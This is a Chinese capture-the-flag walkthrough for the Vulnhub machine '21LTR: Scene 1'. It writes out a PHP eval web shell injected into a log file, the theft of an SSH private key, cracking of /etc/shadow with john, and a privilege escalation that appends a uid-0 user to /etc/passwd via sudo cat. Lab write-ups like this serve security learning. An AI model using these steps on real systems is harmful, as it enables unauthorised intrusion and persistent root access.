【vulnhub】Hack the 21LTR: Scene 1 靶机

信息收集

靶机发现

端口开放了21、22、80

目录扫描

访问页面,查看源码的时候发现了一个账号密码

获取shell

尝试ssh连接没成功,但是ftp连接成功了,ls查看,发现只有一个文件

下载下来

复制代码
get backup_log.php /home/kali/Desktop/1.php
cat 1.php

尝试拼接到刚才目录扫描的目录的logs目录下,发现可以访问到日志文件/logs/backup_log.php

尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口

复制代码
telnet 192.168.2.120 10001
 
<?php @eval($_REQUEST['cmd']);?>

蚁剑连接

蚁剑连接后,可以查看一下敏感文件

因为有ssh服务,就读取一下密钥

/media/USB_1/Stuff/Keys/id_rsa

赋予权限,然后ssh登录

复制代码
chmod 600 id_rsa
 
ssh -i id_rsa [email protected]

在~/.ssh目录下添加config
cd ~/.ssh
vim config
 
Host *
    HostKeyAlgorithms +ssh-rsa
 
 
 
 
要是有这个报错的话(sign_and_send_pubkey: no mutual signature supported)
将一下内容写入config
cd ~/.ssh
vim config
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

连接成功

提权

可以通过cat提权,所以可以看/etc/shadow文件,或者写入文件,选择读取shadow文件,破解密码

然后将root用户的密码写入1.txt,然后开始破解,但是连接的时候,还是连接不上,应该是配置原因,那么只能写入高权限用户了

复制代码
cd /usr/share/wordlists
 
vim 1.txt 
 
john --wordlist=rockyou.txt 1.txt 

命令生成密码

然后依据/etc/passwd文件的格式写一个aroot用户

复制代码
sudo /usr/bin/cat >> /etc/passwd
aroot:$1$J1DRKiec$c6CXi9UUFTMKwHS6lk3bI1:0:0:/root:/bin/bash

提权成功

相关推荐
网络抓包与爬虫1 小时前
flutter WEB端启动优化(加载速度,加载动画)
websocket·网络协议·tcp/ip·http·网络安全·https·udp
网络抓包与爬虫1 小时前
从头开发一个Flutter插件(二)高德地图定位插件
websocket·网络协议·tcp/ip·http·网络安全·https·udp
色的归属感2 小时前
一款功能强大的手机使用情况监控工具
websocket·网络协议·tcp/ip·http·网络安全·https·udp
iOS技术狂热者2 小时前
【Android开发基础】手机传感器信息的获取
websocket·网络协议·tcp/ip·http·网络安全·https·udp
it技术分享just_free2 小时前
软考教材重点内容 信息安全工程师 第21章 网络设备安全
web安全·网络安全·信息安全·系统安全·软考
神经毒素9 小时前
WEB安全--文件上传漏洞--一句话木马的工作方式
网络·安全·web安全·文件上传漏洞
swift开发pk OC开发9 小时前
如何轻松查看安卓手机内存,让手机更流畅
websocket·网络协议·tcp/ip·http·网络安全·https·udp
杭州默安科技10 小时前
大模型AI Agent的工作原理与安全挑战
人工智能·安全
swift开发pk OC开发11 小时前
flutter框架中文文档,android智能手机编程答案
websocket·网络协议·tcp/ip·http·网络安全·https·udp
go_to_hacker13 小时前
AI进行全自动渗透
网络·web安全·网络安全·渗透测试·代码审计